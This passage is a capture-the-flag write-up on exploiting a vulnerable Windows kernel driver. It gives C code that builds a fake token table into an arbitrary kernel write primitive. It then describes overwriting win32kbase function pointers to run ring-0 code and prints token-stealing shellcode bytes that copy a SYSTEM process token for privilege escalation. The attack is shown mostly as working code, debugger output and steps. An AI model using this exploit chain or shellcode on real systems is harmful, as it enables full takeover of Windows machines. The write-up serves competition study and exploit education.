Based on the elgoog symbol files, I recovered the prototypes of the _ii_token_table and related _ii_posting_list structures and wrote them down as the following C definitions:

struct _ii_posting_list {
  char token[16];
  unsigned __int64 size;
  unsigned __int64 capacity;
  unsigned int data[1];
};

struct _ii_token_table {
  unsigned __int64 size;
  unsigned __int64 capacity;
  _ii_posting_list *slots[1];
};

In many ways, the above data structure is similar to a std::map<string, std::vector<unsigned int>> construct in C++. When a program requests that a new (token, value) pair is added to the index, the code iterates through the slots array to find the posting list corresponding to the provided token, and once it’s found, the input value is appended to the list with the following expression:

PostingList.data[PostingList.size++] = value;

Considering that the token table is under our control, the _ii_posting_list.size field is 64-bit wide, and we know the base address of the fake posting list, this behavior is trivial to convert to an arbitrary write primitive. First, we declare the fake posting list in static memory with a known name (“fake”) and capacity equal to UINT64_MAX:

namespace globals {
_ii_posting_list PostingList = {"fake", 0, 0xFFFFFFFFFFFFFFFFLL};
}  // namespace globals

Then, we write a function to initialize the fake token table at the special 0x0000056c00000558 address:

BOOLEAN SetupWriteWhatWhere() {
  CONST PVOID kTablePointer = (PVOID)0x0000056c00000558;
  CONST PVOID kTableBase = (PVOID)0x0000056c00000000;

  if (VirtualAlloc(kTableBase, 0x1000,
                   MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE) == NULL) {
    printf("[-] Unable to allocate fake base.\n");
    return FALSE;
  }

  _ii_token_table *TokenTable = (_ii_token_table *)kTablePointer;
  TokenTable->size = 1;
  TokenTable->capacity = 1;
  TokenTable->slots[0] = &globals::PostingList;

  return TRUE;
}

Lastly, we add a helper function to trigger the 4-byte write-what-where condition:

VOID WriteWhatWhere4(ULONG_PTR CorruptedIndex, ULONG_PTR Where, DWORD What) {
  globals::PostingList.size =
      (Where - (ULONG_PTR)&globals::PostingList.data) / sizeof(DWORD);
  AddToIndex(CorruptedIndex, What, "fake");
}

With all this in place, we can test that it works:

WriteWhatWhere4(CorruptedIndex, 0x4141414141414141LL, 0x42424242);

which should trigger the following exception in the vulnerable driver:

CONTEXT:  ffff9609683dacb0 -- (.cxr 0xffff9609683dacb0)
rax=00007ff6a90b2930 rbx=ffffe48f8135b5a0 rcx=10503052a60d85fc
rdx=0000000042424242 rsi=ffffe48f82d7d70c rdi=ffff9609683db7d4
rip=fffff8038ccc1905 rsp=ffff9609683db6a0 rbp=ffffe48f82c79ef0
 r8=0000000000000001  r9=0000000000000014 r10=0000000000000000
r11=0000000000000000 r12=ffffe48f82c79ef0 r13=ffffe48f81382ac0
r14=0000000000000002 r15=0000000000000000
iopl=0         nv up ei pl nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
searchme+0x1905:
fffff803`8ccc1905 3954881c        cmp     dword ptr [rax+rcx*4+1Ch],edx ds:002b:41414141`4141413c=????????

The above crash log doesn’t fully illustrate the “write” operation, as the bugcheck fires on a prior read from the controlled target address (the cmp instruction above), but the attack works.

Executing shellcode

At this point, I could write arbitrary kernel memory but not read it, which ruled out the option of data-only attacks performed directly from user-mode. However, with the write-what-where primitive in hand, executing ring-0 shellcode should be just a formality. In this case, it was made even easier thanks to the fact that the exploit was running at Medium integrity, so it had access to the base addresses of kernel modules, and could acquire other useful addresses through the various information classes of NtQuerySystemInformation.

In his Black Hat USA 2017 talk, Morten Schenk proposed that arbitrary write can be used to overwrite kernel function pointers residing in the .data section of win32kbase.sys, and more specifically in the win32kbase!gDxgkInterface table used by graphical syscalls from the NtGdiDdDDI* family. The system call handlers are in fact trivial wrappers around the function pointers, and conveniently don’t corrupt any of the arguments passed through the RCX, RDX, … registers.

This allows the attacker to invoke arbitrary kernel functions with controlled arguments, and receive the return values. As discussed by Morten, the complete exploitation process consists of just a few simple steps:

  1. Overwrite the function pointer with the address of nt!ExAllocatePoolWithTag.
  2. Call the routine with the NonPagedPool parameter to allocate writable/executable memory.
  3. Write the ring-0 shellcode to the allocated memory.
  4. Overwrite the function pointer with the address of the shellcode.
  5. Call the shellcode.

The above scheme makes it possible to cleanly execute the desired payload without corrupting the system state (except for the one overwritten pointer). In his paper, Morten suggested the use of NtGdiDdDDICreateAllocation as the proxy syscall, but I found that it was used in Windows sufficiently often that the system would start malfunctioning if the pointer was not promptly fixed up. To make my life a little bit easier, I chose a less frequently used service that seemed to be called exclusively by my exploit: NtGdiDdDDIGetContextSchedulingPriority.

After implementing the logic in code, I could enjoy arbitrary kernel code execution – in this example, a single int3 instruction:

kd> g
Break instruction exception - code 80000003 (first chance)
ffffc689`b8967000 cc              int     3

0: kd> u
ffffc689`b8967000 cc              int     3
ffffc689`b8967001 c3              ret
[...]

0: kd> !pool @rip
Pool page ffffc689b8967000 region is Nonpaged pool
*ffffc689b8967000 : large page allocation, tag is ...., size is 0x1000 bytes
        Owning component : Unknown (update pooltag.txt)

Elevating privileges

In Windows, one of the easier ways of elevating one’s privileges in the system is to “steal” the security token of a system process and copy it to the current process (specifically to EPROCESS.Token). An address of a system process can be found in the static memory of the ntoskrnl.exe image, under nt!PsInitialSystemProcess. As the attack only involves the copying of one pointer between two kernel structures, the shellcode only consists of six instructions:

// The shellcode takes the address of a pointer to a process object in the
// kernel in the first argument (RCX), and copies its security token to the
// current process.
//
//  00000000  65488B042588010000  mov rax, [gs:KPCR.Prcb.CurrentThread]
//  00000009  488B80B8000000      mov rax, [rax + ETHREAD.Tcb.ApcState.Process]
//  00000010  488B09              mov rcx, [rcx]
//  00000013  488B8958030000      mov rcx, [rcx + EPROCESS.Token]
//  0000001A  48898858030000      mov [rax + EPROCESS.Token], rcx
//  00000021  C3                  ret
CONST BYTE ShellcodeBytes[] =
    "\x65\x48\x8B\x04\x25\x88\x01\x00\x00\x48\x8B\x80\xB8\x00\x00\x00"
    "\x48\x8B\x09\x48\x8B\x89\x58\x03\x00\x00\x48\x89\x88\x58\x03\x00"
    "\x00\xC3";

Getting the flag

Once the security token of the exploit process is replaced, we have full control over the operating system. We can start an elevated command prompt and read the flag:

In summary, after approximately 15 hours of work, the exploit was functional and netted us 120 points + 30 points of a first (and last) blood bonus. Thanks go to Niklas for creating this fun challenge and to WCTF organizers for running the competition. I think the task and its solution neatly illustrate that even today, theoretically minor bugs such as off-by-one overflows on the kernel pool may be conceptually simple to exploit, given the right set of circumstances. Buffer overflow exploitation in Windows is not dead just yet. :)

As a reminder, the full source code of the exploit is available on GitHub.
